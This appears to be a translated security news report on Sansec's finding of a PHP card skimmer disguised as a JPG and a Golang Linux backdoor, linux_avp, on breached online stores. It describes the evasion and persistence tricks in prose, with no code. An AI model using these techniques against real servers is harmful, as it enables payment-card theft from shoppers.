Security researchers have discovered that attackers are also deploying a Linux backdoor to compromised e-commerce servers after injecting a credit card skimmer into online store websites.
The PHP-encoded web skimmer (a script designed to steal and exfiltrate payment and customer personal information) is added and camouflaged as a .JPG image file in the / app / design / frontend / folder.
Attackers use this script to download and inject fake payment forms on the payment pages displayed to customers by the hacked online store.
“We discovered that the attacker started with automated e-commerce attack probes, testing dozens of weaknesses in common online store platforms,” the Threat Research team revealed. Sansec.
“After a day and a half, the attacker found a file download vulnerability in one of the plugins in the store. He then downloaded a webshell and modified the server code to intercept customer data.”
Linux malware not detected by security software
The Golang-based malware, spotted by Dutch cybersecurity company Sansec on the same server, was downloaded and executed on breached servers as the linux_avp executable.
Once started, it immediately removes itself from disk and camouflages itself as a “ps -ef” process which would be used to get a list of running processes.
By analyzing the linux_avp backdoor, Sansec discovered that it was waiting for commands from a Beijing server hosted on Alibaba’s network.
They also found that the malware would gain persistence by adding a new crontab entry that would re-download the malicious payload from its command and control server and reinstall the backdoor if it is detected and removed or the server reboots. .
So far, this backdoor has not been detected by anti-malware engines on VirusTotal even though a sample was first uploaded over a month ago on October 8.
The downloader could be the creator of linux_avp since it was submitted a day after researchers at Dutch cybersecurity company Sansec spotted it while investigating the e-commerce site breach.